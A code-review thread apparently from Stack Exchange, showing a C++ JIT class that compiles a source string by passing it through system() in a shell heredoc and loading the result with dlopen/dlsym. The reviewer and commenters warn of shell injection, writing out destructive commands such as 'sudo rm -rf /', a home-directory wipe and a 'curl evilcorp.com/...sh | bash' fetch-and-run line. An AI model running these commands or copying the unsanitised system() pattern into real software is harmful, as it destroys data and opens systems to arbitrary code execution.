# Compile a string into a callable object in C++: a simple JIT based on system, dlopen and dlsym

Tags: c++, linux

Today I discovered that it is possible to dynamically load code at runtime via `dlopen` and `dlsym` (and similar utilities on Windows as well). So the obvious next step was to call the compiler through `system` to build a piece of code into a shared object, which is then loaded to obtain a function pointer. All wrapped in a template class which becomes callable once "compiled".

The code is pretty much at an embryo state (less than 100 lines including the example), but it works and shows the idea, therefore I would love to hear your opinion.

This thing looks sooo simple and yet sooo powerful that I would really be surprised to be the first one having thought about it.

```
// compile with something like: g++ -std=c++20 jit.cpp -ldl

#include <dlfcn.h>
#include <cstdlib>
#include <iostream>
#include <filesystem>

template< class >
class JitFunc;

template< class R, class... Args >
class JitFunc<R(Args...)> {
  public:
  using Func = R(Args...);
  using result_type = R;
  
  private:
  std::string soName;
  
  void * dlso = nullptr;
  Func * func = nullptr;

  public:
  // remember to call compile() anytime you modify these strings
  std::string name;                 // the function name, which should also be found in the source
  std::string source;               // the source code, remember to use extern "C"
  std::string cxx = "/usr/bin/g++"; // the compiler executable
  std::string soPath = "/tmp";      // where to store the shared object (ideally a ramdisk)
  std::string flags;                // custom compiler flags which you may need

  JitFunc(std::string funcName): 
    name(std::move(funcName))
  {}

  ~JitFunc() { 
    close();
    removeSo();
  }

  result_type operator()(Args && ... args) const {
    return func(std::forward<Args>(args)...);
  }
  
  void compile() {
    close();
    removeSo();

    soName = soPath + "/jit_" + name + ".so";
    std::string cmd = cxx;
    auto push = [&cmd](std::string s) { cmd += " "; cmd += std::move(s); };
    push(flags);
    push("-shared -fPIC -o");
    push(soName);
    push("-xc++ - << EOF\n");
    push(source);
    push("\nEOF\n");

    std::system(cmd.c_str());

    dlso = dlopen(soName.c_str(), RTLD_NOW);
    if (!dlso) throw std::runtime_error(dlerror());
    func = (Func*) dlsym(dlso, name.c_str());
    if (!func) throw std::runtime_error(dlerror());
  }

  void close() {
    if (dlso) {
      dlclose(dlso);
      dlso = nullptr;
      func = nullptr;
    }
  }

  void removeSo() {
    if (!soName.empty()) {
      std::filesystem::remove(soName);
      soName.clear();
    }
  }

};

int main() {
  JitFunc<int(int)> f("timestwo");
  f.source = 
R"CODE(
#include <iostream>
extern "C" {
int timestwo(int a) { std::cout << "hello from timestwo" << std::endl; return 2*a; }
}
)CODE"; // using a string literal to avoid having to escape all the double quotes

  f.compile();
  std::cout << f(2) << std::endl;

  return 0;
}
```

Comment: Rather than `system()` I would use `popen()` so that you can full control over input and output of the sub processes.

Answer (score 1):

## Make better use of constructors

Make your constructor take the program source as well as the function name as arguments, and have it compile the code at construction time. This avoids having to manually call `compile()`, which avoids errors such as forgetting to call that function or calling it twice.

The destructor already calls `close()` and `removeSo()`. You should make the latter two functions `private`, so one cannot accidentily call them manually.

## Avoid unnecessary member variables

You should only declare member variables to hold information that you need for a longer period of time. Variables like `source`, `cxx` and so on are only used during the compilation step, they are not needed for anything else. Just remove them, and pass them as parameters to `compile()`, or better to the constructor, as mentioned above.

## Avoid using `<<EOF` with user-provided content

There's a potential issue: what if I do the following?

```
f.source = R"CODE(
extern "C" {
int timestwo(int a) {
    return 2 * a;
}
}
EOF
sudo rm -rf /
)CODE";
```

It's better to write the source code to a temporary file, and point the compiler to that temporary file. This way, you won't accidentily execute shell code.

## Use cases for JIT compilation

This looks very powerful, but what use cases do you have in mind for it? The example you gave is a bad use case; you could just have written `timestwo()` directly in the program. The main use case I can think of is to provide some way to evalute expressions provided by a user at runtime. In that case, you really want to sanitize the input. Because even if you avoid the shell exploits mentioned above, what happens if you do:

```
f.source = R"CODE(
extern "C" {
int timestwo(int a) {
    system("sudo rm -rf /");
    return 2 * a;
}
}
)CODE";
```

If the code you compile is in any way provided by the user, you have to be extremely careful to avoid potential misuse. So I would only use this if I am absolutely sure I need this functionality and if I can make sure it cannot be abused.

Comment: The "unnecessary" member variables are there as options, to avoid making constructors which take way too many args. `close` and `removeSo` exist because they are needed in case of recompilation (which maybe should be dropped), but the destructor is already present and using them. Input sanitation is clearly a good point. Note that one could also inject `std::filesystem::remove_all("/");` (which would still fail due to permissions), although I was thinking about this for a desktop application so that would make very little sense.

Comment: One could also call `std::filesystem::remove_all(getenv(HOME))`, or `system("curl evilcorp.com/nefarious_payload.sh | bash")`. There's a lot of harmful things one can also do without needing root access.

Comment: You can also open a terminal and type that. Again this was not supposing for a server-client environment. On a second thought that is easily circumvented: just let the user fill some data structure then the function is produced based on that. For instance one can replace dynamic polymorphism with a higher-performance no-pointer version.